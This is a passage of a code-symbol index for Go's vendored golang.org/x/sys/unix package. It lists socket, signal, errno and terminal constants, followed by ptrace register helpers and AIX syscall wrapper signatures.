273) | MSG_OOB = 0x1 constant MSG_PEEK (line 274) | MSG_PEEK = 0x2 constant MSG_TRUNC (line 275) | MSG_TRUNC = 0x10 constant MSG_WAITALL (line 276) | MSG_WAITALL = 0x40 constant PRIO_PROCESS (line 277) | PRIO_PROCESS = 1 constant PRIO_PGRP (line 278) | PRIO_PGRP = 2 constant PRIO_USER (line 279) | PRIO_USER = 3 constant RLIMIT_CPU (line 280) | RLIMIT_CPU = 0 constant RLIMIT_FSIZE (line 281) | RLIMIT_FSIZE = 1 constant RLIMIT_DATA (line 282) | RLIMIT_DATA = 2 constant RLIMIT_STACK (line 283) | RLIMIT_STACK = 3 constant RLIMIT_CORE (line 284) | RLIMIT_CORE = 4 constant RLIMIT_AS (line 285) | RLIMIT_AS = 5 constant RLIMIT_NOFILE (line 286) | RLIMIT_NOFILE = 6 constant RLIMIT_MEMLIMIT (line 287) | RLIMIT_MEMLIMIT = 7 constant RLIM_INFINITY (line 288) | RLIM_INFINITY = 2147483647 constant SCM_RIGHTS (line 289) | SCM_RIGHTS = 0x01 constant SF_CLOSE (line 290) | SF_CLOSE = 0x00000002 constant SF_REUSE (line 291) | SF_REUSE = 0x00000001 constant SHUT_RD (line 292) | SHUT_RD = 0 constant SHUT_RDWR (line 293) | SHUT_RDWR = 2 constant SHUT_WR (line 294) | SHUT_WR = 1 constant SOCK_CONN_DGRAM (line 295) | SOCK_CONN_DGRAM = 6 constant SOCK_DGRAM (line 296) | SOCK_DGRAM = 2 constant SOCK_RAW (line 297) | SOCK_RAW = 3 constant SOCK_RDM (line 298) | SOCK_RDM = 4 constant SOCK_SEQPACKET (line 299) | SOCK_SEQPACKET = 5 constant SOCK_STREAM (line 300) | SOCK_STREAM = 1 constant SOL_SOCKET (line 301) | SOL_SOCKET = 0xffff constant SOMAXCONN (line 302) | SOMAXCONN = 10 constant SO_ACCEPTCONN (line 303) | SO_ACCEPTCONN = 0x0002 constant SO_ACCEPTECONNABORTED (line 304) | SO_ACCEPTECONNABORTED = 0x0006 constant SO_ACKNOW (line 305) | SO_ACKNOW = 0x7700 constant SO_BROADCAST (line 306) | SO_BROADCAST = 0x0020 constant SO_BULKMODE (line 307) | SO_BULKMODE = 0x8000 constant SO_CKSUMRECV (line 308) | SO_CKSUMRECV = 0x0800 constant SO_CLOSE (line 309) | SO_CLOSE = 0x01 constant SO_CLUSTERCONNTYPE (line 310) | SO_CLUSTERCONNTYPE = 0x00004001 constant SO_CLUSTERCONNTYPE_INTERNAL (line 311) | SO_CLUSTERCONNTYPE_INTERNAL = 8 constant SO_CLUSTERCONNTYPE_NOCONN (line 312) | SO_CLUSTERCONNTYPE_NOCONN = 0 constant SO_CLUSTERCONNTYPE_NONE (line 313) | SO_CLUSTERCONNTYPE_NONE = 1 constant SO_CLUSTERCONNTYPE_SAME_CLUSTER (line 314) | SO_CLUSTERCONNTYPE_SAME_CLUSTER = 2 constant SO_CLUSTERCONNTYPE_SAME_IMAGE (line 315) | SO_CLUSTERCONNTYPE_SAME_IMAGE = 4 constant SO_DEBUG (line 316) | SO_DEBUG = 0x0001 constant SO_DONTROUTE (line 317) | SO_DONTROUTE = 0x0010 constant SO_ERROR (line 318) | SO_ERROR = 0x1007 constant SO_IGNOREINCOMINGPUSH (line 319) | SO_IGNOREINCOMINGPUSH = 0x1 constant SO_IGNORESOURCEVIPA (line 320) | SO_IGNORESOURCEVIPA = 0x0002 constant SO_KEEPALIVE (line 321) | SO_KEEPALIVE = 0x0008 constant SO_LINGER (line 322) | SO_LINGER = 0x0080 constant SO_NONBLOCKLOCAL (line 323) | SO_NONBLOCKLOCAL = 0x8001 constant SO_NOREUSEADDR (line 324) | SO_NOREUSEADDR = 0x1000 constant SO_OOBINLINE (line 325) | SO_OOBINLINE = 0x0100 constant SO_OPTACK (line 326) | SO_OPTACK = 0x8004 constant SO_OPTMSS (line 327) | SO_OPTMSS = 0x8003 constant SO_RCVBUF (line 328) | SO_RCVBUF = 0x1002 constant SO_RCVLOWAT (line 329) | SO_RCVLOWAT = 0x1004 constant SO_RCVTIMEO (line 330) | SO_RCVTIMEO = 0x1006 constant SO_REUSEADDR (line 331) | SO_REUSEADDR = 0x0004 constant SO_REUSEPORT (line 332) | SO_REUSEPORT = 0x0200 constant SO_SECINFO (line 333) | SO_SECINFO = 0x00004002 constant SO_SET (line 334) | SO_SET = 0x0200 constant SO_SNDBUF (line 335) | SO_SNDBUF = 0x1001 constant SO_SNDLOWAT (line 336) | SO_SNDLOWAT = 0x1003 constant SO_SNDTIMEO (line 337) | SO_SNDTIMEO = 0x1005 constant SO_TYPE (line 338) | SO_TYPE = 0x1008 constant SO_UNSET (line 339) | SO_UNSET = 0x0400 constant SO_USELOOPBACK (line 340) | SO_USELOOPBACK = 0x0040 constant SO_USE_IFBUFS (line 341) | SO_USE_IFBUFS = 0x0400 constant S_ISUID (line 342) | S_ISUID = 0x0800 constant S_ISGID (line 343) | S_ISGID = 0x0400 constant S_ISVTX (line 344) | S_ISVTX = 0x0200 constant S_IRUSR (line 345) | S_IRUSR = 0x0100 constant S_IWUSR (line 346) | S_IWUSR = 0x0080 constant S_IXUSR (line 347) | S_IXUSR = 0x0040 constant S_IRWXU (line 348) | S_IRWXU = 0x01C0 constant S_IRGRP (line 349) | S_IRGRP = 0x0020 constant S_IWGRP (line 350) | S_IWGRP = 0x0010 constant S_IXGRP (line 351) | S_IXGRP = 0x0008 constant S_IRWXG (line 352) | S_IRWXG = 0x0038 constant S_IROTH (line 353) | S_IROTH = 0x0004 constant S_IWOTH (line 354) | S_IWOTH = 0x0002 constant S_IXOTH (line 355) | S_IXOTH = 0x0001 constant S_IRWXO (line 356) | S_IRWXO = 0x0007 constant S_IREAD (line 357) | S_IREAD = S_IRUSR constant S_IWRITE (line 358) | S_IWRITE = S_IWUSR constant S_IEXEC (line 359) | S_IEXEC = S_IXUSR constant S_IFDIR (line 360) | S_IFDIR = 0x01000000 constant S_IFCHR (line 361) | S_IFCHR = 0x02000000 constant S_IFREG (line 362) | S_IFREG = 0x03000000 constant S_IFFIFO (line 363) | S_IFFIFO = 0x04000000 constant S_IFIFO (line 364) | S_IFIFO = 0x04000000 constant S_IFLNK (line 365) | S_IFLNK = 0x05000000 constant S_IFBLK (line 366) | S_IFBLK = 0x06000000 constant S_IFSOCK (line 367) | S_IFSOCK = 0x07000000 constant S_IFVMEXTL (line 368) | S_IFVMEXTL = 0xFE000000 constant S_IFVMEXTL_EXEC (line 369) | S_IFVMEXTL_EXEC = 0x00010000 constant S_IFVMEXTL_DATA (line 370) | S_IFVMEXTL_DATA = 0x00020000 constant S_IFVMEXTL_MEL (line 371) | S_IFVMEXTL_MEL = 0x00030000 constant S_IFEXTL (line 372) | S_IFEXTL = 0x00000001 constant S_IFPROGCTL (line 373) | S_IFPROGCTL = 0x00000002 constant S_IFAPFCTL (line 374) | S_IFAPFCTL = 0x00000004 constant S_IFNOSHARE (line 375) | S_IFNOSHARE = 0x00000008 constant S_IFSHARELIB (line 376) | S_IFSHARELIB = 0x00000010 constant S_IFMT (line 377) | S_IFMT = 0xFF000000 constant S_IFMST (line 378) | S_IFMST = 0x00FF0000 constant TCP_KEEPALIVE (line 379) | TCP_KEEPALIVE = 0x8 constant TCP_NODELAY (line 380) | TCP_NODELAY = 0x1 constant TCP_INFO (line 381) | TCP_INFO = 0xb constant TCP_USER_TIMEOUT (line 382) | TCP_USER_TIMEOUT = 0x1 constant TIOCGWINSZ (line 383) | TIOCGWINSZ = 0x4008a368 constant TIOCSWINSZ (line 384) | TIOCSWINSZ = 0x8008a367 constant TIOCSBRK (line 385) | TIOCSBRK = 0x2000a77b constant TIOCCBRK (line 386) | TIOCCBRK = 0x2000a77a constant TIOCSTI (line 387) | TIOCSTI = 0x8001a772 constant TIOCGPGRP (line 388) | TIOCGPGRP = 0x4004a777 constant TCSANOW (line 389) | TCSANOW = 0 constant TCSETS (line 390) | TCSETS = 0 constant TCSADRAIN (line 391) | TCSADRAIN = 1 constant TCSETSW (line 392) | TCSETSW = 1 constant TCSAFLUSH (line 393) | TCSAFLUSH = 2 constant TCSETSF (line 394) | TCSETSF = 2 constant TCGETS (line 395) | TCGETS = 3 constant TCIFLUSH (line 396) | TCIFLUSH = 0 constant TCOFLUSH (line 397) | TCOFLUSH = 1 constant TCIOFLUSH (line 398) | TCIOFLUSH = 2 constant TCOOFF (line 399) | TCOOFF = 0 constant TCOON (line 400) | TCOON = 1 constant TCIOFF (line 401) | TCIOFF = 2 constant TCION (line 402) | TCION = 3 constant TIOCSPGRP (line 403) | TIOCSPGRP = 0x8004a776 constant TIOCNOTTY (line 404) | TIOCNOTTY = 0x2000a771 constant TIOCEXCL (line 405) | TIOCEXCL = 0x2000a70d constant TIOCNXCL (line 406) | TIOCNXCL = 0x2000a70e constant TIOCGETD (line 407) | TIOCGETD = 0x4004a700 constant TIOCSETD (line 408) | TIOCSETD = 0x8004a701 constant TIOCPKT (line 409) | TIOCPKT = 0x8004a770 constant TIOCSTOP (line 410) | TIOCSTOP = 0x2000a76f constant TIOCSTART (line 411) | TIOCSTART = 0x2000a76e constant TIOCUCNTL (line 412) | TIOCUCNTL = 0x8004a766 constant TIOCREMOTE (line 413) | TIOCREMOTE = 0x8004a769 constant TIOCMGET (line 414) | TIOCMGET = 0x4004a76a constant TIOCMSET (line 415) | TIOCMSET = 0x8004a76d constant TIOCMBIC (line 416) | TIOCMBIC = 0x8004a76b constant TIOCMBIS (line 417) | TIOCMBIS = 0x8004a76c constant VINTR (line 418) | VINTR = 0 constant VQUIT (line 419) | VQUIT = 1 constant VERASE (line 420) | VERASE = 2 constant VKILL (line 421) | VKILL = 3 constant VEOF (line 422) | VEOF = 4 constant VEOL (line 423) | VEOL = 5 constant VMIN (line 424) | VMIN = 6 constant VSTART (line 425) | VSTART = 7 constant VSTOP (line 426) | VSTOP = 8 constant VSUSP (line 427) | VSUSP = 9 constant VTIME (line 428) | VTIME = 10 constant WCONTINUED (line 429) | WCONTINUED = 0x4 constant WNOHANG (line 430) | WNOHANG = 0x1 constant WUNTRACED (line 431) | WUNTRACED = 0x2 constant _BPX_SWAP (line 432) | _BPX_SWAP = 1 constant _BPX_NONSWAP (line 433) | _BPX_NONSWAP = 2 constant MCL_CURRENT (line 434) | MCL_CURRENT = 1 constant MCL_FUTURE (line 435) | MCL_FUTURE = 2 constant MCL_ONFAULT (line 436) | MCL_ONFAULT = 3 constant MADV_NORMAL (line 437) | MADV_NORMAL = 0 constant MADV_RANDOM (line 438) | MADV_RANDOM = 1 constant MADV_SEQUENTIAL (line 439) | MADV_SEQUENTIAL = 2 constant MADV_WILLNEED (line 440) | MADV_WILLNEED = 3 constant MADV_REMOVE (line 441) | MADV_REMOVE = 4 constant MADV_DONTFORK (line 442) | MADV_DONTFORK = 5 constant MADV_DOFORK (line 443) | MADV_DOFORK = 6 constant MADV_HWPOISON (line 444) | MADV_HWPOISON = 7 constant MADV_MERGEABLE (line 445) | MADV_MERGEABLE = 8 constant MADV_UNMERGEABLE (line 446) | MADV_UNMERGEABLE = 9 constant MADV_SOFT_OFFLINE (line 447) | MADV_SOFT_OFFLINE = 10 constant MADV_HUGEPAGE (line 448) | MADV_HUGEPAGE = 11 constant MADV_NOHUGEPAGE (line 449) | MADV_NOHUGEPAGE = 12 constant MADV_DONTDUMP (line 450) | MADV_DONTDUMP = 13 constant MADV_DODUMP (line 451) | MADV_DODUMP = 14 constant MADV_FREE (line 452) | MADV_FREE = 15 constant MADV_WIPEONFORK (line 453) | MADV_WIPEONFORK = 16 constant MADV_KEEPONFORK (line 454) | MADV_KEEPONFORK = 17 constant AT_SYMLINK_NOFOLLOW (line 455) | AT_SYMLINK_NOFOLLOW = 1 constant AT_FDCWD (line 456) | AT_FDCWD = 2 constant EDOM (line 460) | EDOM = Errno(1) constant ERANGE (line 461) | ERANGE = Errno(2) constant EACCES (line 462) | EACCES = Errno(111) constant EAGAIN (line 463) | EAGAIN = Errno(112) constant EBADF (line 464) | EBADF = Errno(113) constant EBUSY (line 465) | EBUSY = Errno(114) constant ECHILD (line 466) | ECHILD = Errno(115) constant EDEADLK (line 467) | EDEADLK = Errno(116) constant EEXIST (line 468) | EEXIST = Errno(117) constant EFAULT (line 469) | EFAULT = Errno(118) constant EFBIG (line 470) | EFBIG = Errno(119) constant EINTR (line 471) | EINTR = Errno(120) constant EINVAL (line 472) | EINVAL = Errno(121) constant EIO (line 473) | EIO = Errno(122) constant EISDIR (line 474) | EISDIR = Errno(123) constant EMFILE (line 475) | EMFILE = Errno(124) constant EMLINK (line 476) | EMLINK = Errno(125) constant ENAMETOOLONG (line 477) | ENAMETOOLONG = Errno(126) constant ENFILE (line 478) | ENFILE = Errno(127) constant ENODEV (line 479) | ENODEV = Errno(128) constant ENOENT (line 480) | ENOENT = Errno(129) constant ENOEXEC (line 481) | ENOEXEC = Errno(130) constant ENOLCK (line 482) | ENOLCK = Errno(131) constant ENOMEM (line 483) | ENOMEM = Errno(132) constant ENOSPC (line 484) | ENOSPC = Errno(133) constant ENOSYS (line 485) | ENOSYS = Errno(134) constant ENOTDIR (line 486) | ENOTDIR = Errno(135) constant ENOTEMPTY (line 487) | ENOTEMPTY = Errno(136) constant ENOTTY (line 488) | ENOTTY = Errno(137) constant ENXIO (line 489) | ENXIO = Errno(138) constant EPERM (line 490) | EPERM = Errno(139) constant EPIPE (line 491) | EPIPE = Errno(140) constant EROFS (line 492) | EROFS = Errno(141) constant ESPIPE (line 493) | ESPIPE = Errno(142) constant ESRCH (line 494) | ESRCH = Errno(143) constant EXDEV (line 495) | EXDEV = Errno(144) constant E2BIG (line 496) | E2BIG = Errno(145) constant ELOOP (line 497) | ELOOP = Errno(146) constant EILSEQ (line 498) | EILSEQ = Errno(147) constant ENODATA (line 499) | ENODATA = Errno(148) constant EOVERFLOW (line 500) | EOVERFLOW = Errno(149) constant EMVSNOTUP (line 501) | EMVSNOTUP = Errno(150) constant ECMSSTORAGE (line 502) | ECMSSTORAGE = Errno(151) constant EMVSDYNALC (line 503) | EMVSDYNALC = Errno(151) constant EMVSCVAF (line 504) | EMVSCVAF = Errno(152) constant EMVSCATLG (line 505) | EMVSCATLG = Errno(153) constant ECMSINITIAL (line 506) | ECMSINITIAL = Errno(156) constant EMVSINITIAL (line 507) | EMVSINITIAL = Errno(156) constant ECMSERR (line 508) | ECMSERR = Errno(157) constant EMVSERR (line 509) | EMVSERR = Errno(157) constant EMVSPARM (line 510) | EMVSPARM = Errno(158) constant ECMSPFSFILE (line 511) | ECMSPFSFILE = Errno(159) constant EMVSPFSFILE (line 512) | EMVSPFSFILE = Errno(159) constant EMVSBADCHAR (line 513) | EMVSBADCHAR = Errno(160) constant ECMSPFSPERM (line 514) | ECMSPFSPERM = Errno(162) constant EMVSPFSPERM (line 515) | EMVSPFSPERM = Errno(162) constant EMVSSAFEXTRERR (line 516) | EMVSSAFEXTRERR = Errno(163) constant EMVSSAF2ERR (line 517) | EMVSSAF2ERR = Errno(164) constant EMVSTODNOTSET (line 518) | EMVSTODNOTSET = Errno(165) constant EMVSPATHOPTS (line 519) | EMVSPATHOPTS = Errno(166) constant EMVSNORTL (line 520) | EMVSNORTL = Errno(167) constant EMVSEXPIRE (line 521) | EMVSEXPIRE = Errno(168) constant EMVSPASSWORD (line 522) | EMVSPASSWORD = Errno(169) constant EMVSWLMERROR (line 523) | EMVSWLMERROR = Errno(170) constant EMVSCPLERROR (line 524) | EMVSCPLERROR = Errno(171) constant EMVSARMERROR (line 525) | EMVSARMERROR = Errno(172) constant ELENOFORK (line 526) | ELENOFORK = Errno(200) constant ELEMSGERR (line 527) | ELEMSGERR = Errno(201) constant EFPMASKINV (line 528) | EFPMASKINV = Errno(202) constant EFPMODEINV (line 529) | EFPMODEINV = Errno(203) constant EBUFLEN (line 530) | EBUFLEN = Errno(227) constant EEXTLINK (line 531) | EEXTLINK = Errno(228) constant ENODD (line 532) | ENODD = Errno(229) constant ECMSESMERR (line 533) | ECMSESMERR = Errno(230) constant ECPERR (line 534) | ECPERR = Errno(231) constant ELEMULTITHREAD (line 535) | ELEMULTITHREAD = Errno(232) constant ELEFENCE (line 536) | ELEFENCE = Errno(244) constant EBADDATA (line 537) | EBADDATA = Errno(245) constant EUNKNOWN (line 538) | EUNKNOWN = Errno(246) constant ENOTSUP (line 539) | ENOTSUP = Errno(247) constant EBADNAME (line 540) | EBADNAME = Errno(248) constant ENOTSAFE (line 541) | ENOTSAFE = Errno(249) constant ELEMULTITHREADFORK (line 542) | ELEMULTITHREADFORK = Errno(257) constant ECUNNOENV (line 543) | ECUNNOENV = Errno(258) constant ECUNNOCONV (line 544) | ECUNNOCONV = Errno(259) constant ECUNNOTALIGNED (line 545) | ECUNNOTALIGNED = Errno(260) constant ECUNERR (line 546) | ECUNERR = Errno(262) constant EIBMBADCALL (line 547) | EIBMBADCALL = Errno(1000) constant EIBMBADPARM (line 548) | EIBMBADPARM = Errno(1001) constant EIBMSOCKOUTOFRANGE (line 549) | EIBMSOCKOUTOFRANGE = Errno(1002) constant EIBMSOCKINUSE (line 550) | EIBMSOCKINUSE = Errno(1003) constant EIBMIUCVERR (line 551) | EIBMIUCVERR = Errno(1004) constant EOFFLOADboxERROR (line 552) | EOFFLOADboxERROR = Errno(1005) constant EOFFLOADboxRESTART (line 553) | EOFFLOADboxRESTART = Errno(1006) constant EOFFLOADboxDOWN (line 554) | EOFFLOADboxDOWN = Errno(1007) constant EIBMCONFLICT (line 555) | EIBMCONFLICT = Errno(1008) constant EIBMCANCELLED (line 556) | EIBMCANCELLED = Errno(1009) constant EIBMBADTCPNAME (line 557) | EIBMBADTCPNAME = Errno(1011) constant ENOTBLK (line 558) | ENOTBLK = Errno(1100) constant ETXTBSY (line 559) | ETXTBSY = Errno(1101) constant EWOULDBLOCK (line 560) | EWOULDBLOCK = Errno(1102) constant EINPROGRESS (line 561) | EINPROGRESS = Errno(1103) constant EALREADY (line 562) | EALREADY = Errno(1104) constant ENOTSOCK (line 563) | ENOTSOCK = Errno(1105) constant EDESTADDRREQ (line 564) | EDESTADDRREQ = Errno(1106) constant EMSGSIZE (line 565) | EMSGSIZE = Errno(1107) constant EPROTOTYPE (line 566) | EPROTOTYPE = Errno(1108) constant ENOPROTOOPT (line 567) | ENOPROTOOPT = Errno(1109) constant EPROTONOSUPPORT (line 568) | EPROTONOSUPPORT = Errno(1110) constant ESOCKTNOSUPPORT (line 569) | ESOCKTNOSUPPORT = Errno(1111) constant EOPNOTSUPP (line 570) | EOPNOTSUPP = Errno(1112) constant EPFNOSUPPORT (line 571) | EPFNOSUPPORT = Errno(1113) constant EAFNOSUPPORT (line 572) | EAFNOSUPPORT = Errno(1114) constant EADDRINUSE (line 573) | EADDRINUSE = Errno(1115) constant EADDRNOTAVAIL (line 574) | EADDRNOTAVAIL = Errno(1116) constant ENETDOWN (line 575) | ENETDOWN = Errno(1117) constant ENETUNREACH (line 576) | ENETUNREACH = Errno(1118) constant ENETRESET (line 577) | ENETRESET = Errno(1119) constant ECONNABORTED (line 578) | ECONNABORTED = Errno(1120) constant ECONNRESET (line 579) | ECONNRESET = Errno(1121) constant ENOBUFS (line 580) | ENOBUFS = Errno(1122) constant EISCONN (line 581) | EISCONN = Errno(1123) constant ENOTCONN (line 582) | ENOTCONN = Errno(1124) constant ESHUTDOWN (line 583) | ESHUTDOWN = Errno(1125) constant ETOOMANYREFS (line 584) | ETOOMANYREFS = Errno(1126) constant ETIMEDOUT (line 585) | ETIMEDOUT = Errno(1127) constant ECONNREFUSED (line 586) | ECONNREFUSED = Errno(1128) constant EHOSTDOWN (line 587) | EHOSTDOWN = Errno(1129) constant EHOSTUNREACH (line 588) | EHOSTUNREACH = Errno(1130) constant EPROCLIM (line 589) | EPROCLIM = Errno(1131) constant EUSERS (line 590) | EUSERS = Errno(1132) constant EDQUOT (line 591) | EDQUOT = Errno(1133) constant ESTALE (line 592) | ESTALE = Errno(1134) constant EREMOTE (line 593) | EREMOTE = Errno(1135) constant ENOSTR (line 594) | ENOSTR = Errno(1136) constant ETIME (line 595) | ETIME = Errno(1137) constant ENOSR (line 596) | ENOSR = Errno(1138) constant ENOMSG (line 597) | ENOMSG = Errno(1139) constant EBADMSG (line 598) | EBADMSG = Errno(1140) constant EIDRM (line 599) | EIDRM = Errno(1141) constant ENONET (line 600) | ENONET = Errno(1142) constant ERREMOTE (line 601) | ERREMOTE = Errno(1143) constant ENOLINK (line 602) | ENOLINK = Errno(1144) constant EADV (line 603) | EADV = Errno(1145) constant ESRMNT (line 604) | ESRMNT = Errno(1146) constant ECOMM (line 605) | ECOMM = Errno(1147) constant EPROTO (line 606) | EPROTO = Errno(1148) constant EMULTIHOP (line 607) | EMULTIHOP = Errno(1149) constant EDOTDOT (line 608) | EDOTDOT = Errno(1150) constant EREMCHG (line 609) | EREMCHG = Errno(1151) constant ECANCELED (line 610) | ECANCELED = Errno(1152) constant EINTRNODATA (line 611) | EINTRNODATA = Errno(1159) constant ENOREUSE (line 612) | ENOREUSE = Errno(1160) constant ENOMOVE (line 613) | ENOMOVE = Errno(1161) constant SIGHUP (line 618) | SIGHUP = Signal(1) constant SIGINT (line 619) | SIGINT = Signal(2) constant SIGABRT (line 620) | SIGABRT = Signal(3) constant SIGILL (line 621) | SIGILL = Signal(4) constant SIGPOLL (line 622) | SIGPOLL = Signal(5) constant SIGURG (line 623) | SIGURG = Signal(6) constant SIGSTOP (line 624) | SIGSTOP = Signal(7) constant SIGFPE (line 625) | SIGFPE = Signal(8) constant SIGKILL (line 626) | SIGKILL = Signal(9) constant SIGBUS (line 627) | SIGBUS = Signal(10) constant SIGSEGV (line 628) | SIGSEGV = Signal(11) constant SIGSYS (line 629) | SIGSYS = Signal(12) constant SIGPIPE (line 630) | SIGPIPE = Signal(13) constant SIGALRM (line 631) | SIGALRM = Signal(14) constant SIGTERM (line 632) | SIGTERM = Signal(15) constant SIGUSR1 (line 633) | SIGUSR1 = Signal(16) constant SIGUSR2 (line 634) | SIGUSR2 = Signal(17) constant SIGABND (line 635) | SIGABND = Signal(18) constant SIGCONT (line 636) | SIGCONT = Signal(19) constant SIGCHLD (line 637) | SIGCHLD = Signal(20) constant SIGTTIN (line 638) | SIGTTIN = Signal(21) constant SIGTTOU (line 639) | SIGTTOU = Signal(22) constant SIGIO (line 640) | SIGIO = Signal(23) constant SIGQUIT (line 641) | SIGQUIT = Signal(24) constant SIGTSTP (line 642) | SIGTSTP = Signal(25) constant SIGTRAP (line 643) | SIGTRAP = Signal(26) constant SIGIOERR (line 644) | SIGIOERR = Signal(27) constant SIGWINCH (line 645) | SIGWINCH = Signal(28) constant SIGXCPU (line 646) | SIGXCPU = Signal(29) constant SIGXFSZ (line 647) | SIGXFSZ = Signal(30) constant SIGVTALRM (line 648) | SIGVTALRM = Signal(31) constant SIGPROF (line 649) | SIGPROF = Signal(32) constant SIGDANGER (line 650) | SIGDANGER = Signal(33) constant SIGTHSTOP (line 651) | SIGTHSTOP = Signal(34) constant SIGTHCONT (line 652) | SIGTHCONT = Signal(35) constant SIGTRACE (line 653) | SIGTRACE = Signal(37) constant SIGDCE (line 654) | SIGDCE = Signal(38) constant SIGDUMP (line 655) | SIGDUMP = Signal(39) FILE: vendor/golang.org/x/sys/unix/zptrace_armnn_linux.go type PtraceRegsArm (line 10) | type PtraceRegsArm struct function PtraceGetRegsArm (line 15) | func PtraceGetRegsArm(pid int, regsout *PtraceRegsArm) error { function PtraceSetRegsArm (line 20) | func PtraceSetRegsArm(pid int, regs *PtraceRegsArm) error { type PtraceRegsArm64 (line 25) | type PtraceRegsArm64 struct function PtraceGetRegsArm64 (line 33) | func PtraceGetRegsArm64(pid int, regsout *PtraceRegsArm64) error { function PtraceSetRegsArm64 (line 38) | func PtraceSetRegsArm64(pid int, regs *PtraceRegsArm64) error { FILE: vendor/golang.org/x/sys/unix/zptrace_linux_arm64.go function PtraceGetRegSetArm64 (line 8) | func PtraceGetRegSetArm64(pid, addr int, regsout *PtraceRegsArm64) error { function PtraceSetRegSetArm64 (line 14) | func PtraceSetRegSetArm64(pid, addr int, regs *PtraceRegsArm64) error { FILE: vendor/golang.org/x/sys/unix/zptrace_mipsnn_linux.go type PtraceRegsMips (line 10) | type PtraceRegsMips struct function PtraceGetRegsMips (line 21) | func PtraceGetRegsMips(pid int, regsout *PtraceRegsMips) error { function PtraceSetRegsMips (line 26) | func PtraceSetRegsMips(pid int, regs *PtraceRegsMips) error { type PtraceRegsMips64 (line 31) | type PtraceRegsMips64 struct function PtraceGetRegsMips64 (line 42) | func PtraceGetRegsMips64(pid int, regsout *PtraceRegsMips64) error { function PtraceSetRegsMips64 (line 47) | func PtraceSetRegsMips64(pid int, regs *PtraceRegsMips64) error { FILE: vendor/golang.org/x/sys/unix/zptrace_mipsnnle_linux.go type PtraceRegsMipsle (line 10) | type PtraceRegsMipsle struct function PtraceGetRegsMipsle (line 21) | func PtraceGetRegsMipsle(pid int, regsout *PtraceRegsMipsle) error { function PtraceSetRegsMipsle (line 26) | func PtraceSetRegsMipsle(pid int, regs *PtraceRegsMipsle) error { type PtraceRegsMips64le (line 31) | type PtraceRegsMips64le struct function PtraceGetRegsMips64le (line 42) | func PtraceGetRegsMips64le(pid int, regsout *PtraceRegsMips64le) error { function PtraceSetRegsMips64le (line 47) | func PtraceSetRegsMips64le(pid int, regs *PtraceRegsMips64le) error { FILE: vendor/golang.org/x/sys/unix/zptrace_x86_linux.go type PtraceRegs386 (line 10) | type PtraceRegs386 struct function PtraceGetRegs386 (line 31) | func PtraceGetRegs386(pid int, regsout *PtraceRegs386) error { function PtraceSetRegs386 (line 36) | func PtraceSetRegs386(pid int, regs *PtraceRegs386) error { type PtraceRegsAmd64 (line 41) | type PtraceRegsAmd64 struct function PtraceGetRegsAmd64 (line 72) | func PtraceGetRegsAmd64(pid int, regsout *PtraceRegsAmd64) error { function PtraceSetRegsAmd64 (line 77) | func PtraceSetRegsAmd64(pid int, regs *PtraceRegsAmd64) error { FILE: vendor/golang.org/x/sys/unix/zsyscall_aix_ppc.go function utimes (line 137) | func utimes(path string, times *[2]Timeval) (err error) { function utimensat (line 148) | func utimensat(dirfd int, path string, times *[2]Timespec, flag int) (er... function getcwd (line 159) | func getcwd(buf []byte) (err error) { function accept (line 175) | func accept(s int, rsa *RawSockaddrAny, addrlen *_Socklen) (fd int, err ... function getdirent (line 186) | func getdirent(fd int, buf []byte) (n int, err error) { function wait4 (line 203) | func wait4(pid Pid_t, status *_C_int, options int, rusage *Rusage) (wpid... function ioctl (line 214) | func ioctl(fd int, req int, arg uintptr) (err error) { function ioctlPtr (line 224) | func ioctlPtr(fd int, req int, arg unsafe.Pointer) (err error) { function FcntlInt (line 234) | func FcntlInt(fd uintptr, cmd int, arg int) (r int, err error) { function FcntlFlock (line 245) | func FcntlFlock(fd uintptr, cmd int, lk *Flock_t) (err error) { function fcntl (line 255) | func fcntl(fd int, cmd int, arg int) (val int, err error) { function fsyncRange (line 266) | func fsyncRange(fd int, how int, start int64, length int64) (err error) { function Acct (line 276) | func Acct(path string) (err error) { function Chdir (line 287) | func Chdir(path string) (err error) { function Chroot (line 298) | func Chroot(path string) (err error) { function Close (line 309) | func Close(fd int) (err error) { function Dup (line 319) | func Dup(oldfd int) (fd int, err error) { function Exit (line 330) | func Exit(code int) { function Faccessat (line 337) | func Faccessat(dirfd int, path string, mode uint32, flags int) (err erro... function Fchdir (line 348) | func Fchdir(fd int) (err error) { function Fchmod (line 358) | func Fchmod(fd int, mode uint32) (err error) { function Fchmodat (line 368) | func Fchmodat(dirfd int, path string, mode uint32, flags int) (err error) { function Fchownat (line 379) | func Fchownat(dirfd int, path string, uid int, gid int, flags int) (err ... function Fdatasync (line 390) | func Fdatasync(fd int) (err error) { function Getpgid (line 400) | func Getpgid(pid int) (pgid int, err error) { function Getpgrp (line 411) | func Getpgrp() (pid int) { function Getpid (line 419) | func Getpid() (pid int) { function Getppid (line 427) | func Getppid() (ppid int) { function Getpriority (line 435) | func Getpriority(which int, who int) (prio int, err error) { function Getrusage (line 446) | func Getrusage(who int, rusage *Rusage) (err error) { function Getsid (line 456) | func Getsid(pid int) (sid int, err error) { function Kill (line 467) | func Kill(pid int, sig Signal) (err error) { function Klogctl (line 477) | func Klogctl(typ int, buf []byte) (n int, err error) { function Mkdir (line 494) | func Mkdir(dirfd int, path string, mode uint32) (err error) { function Mkdirat (line 505) | func Mkdirat(dirfd int, path string, mode uint32) (err error) { function Mkfifo (line 516) | func Mkfifo(path string, mode uint32) (err error) { function Mknod (line 527) | func Mknod(path string, mode uint32, dev int) (err error) { function Mknodat (line 538) | func Mknodat(dirfd int, path string, mode uint32, dev int) (err error) { function Nanosleep (line 549) | func Nanosleep(time *Timespec, leftover *Timespec) (err error) { function Open (line 559) | func Open(path string, mode int, perm uint32) (fd int, err error) { function Openat (line 571) | func Openat(dirfd int, path string, flags int, mode uint32) (fd int, err... function read (line 583) | func read(fd int, p []byte) (n int, err error) { function Readlink (line 600) | func Readlink(path string, buf []byte) (n int, err error) { function Renameat (line 618) | func Renameat(olddirfd int, oldpath string, newdirfd int, newpath string... function Setdomainname (line 630) | func Setdomainname(p []byte) (err error) { function Sethostname (line 646) | func Sethostname(p []byte) (err error) { function Setpgid (line 662) | func Setpgid(pid int, pgid int) (err error) { function Setsid (line 672) | func Setsid() (pid int, err error) { function Settimeofday (line 683) | func Settimeofday(tv *Timeval) (err error) { function Setuid (line 693) | func Setuid(uid int) (err error) { function Setgid (line 703) | func Setgid(uid int) (err error) { function Setpriority (line 713) | func Setpriority(which int, who int, prio int) (err error) { function Statx (line 723) | func Statx(dirfd int, path string, flags int, mask int, stat *Statx_t) (... function Sync (line 734) | func Sync() { 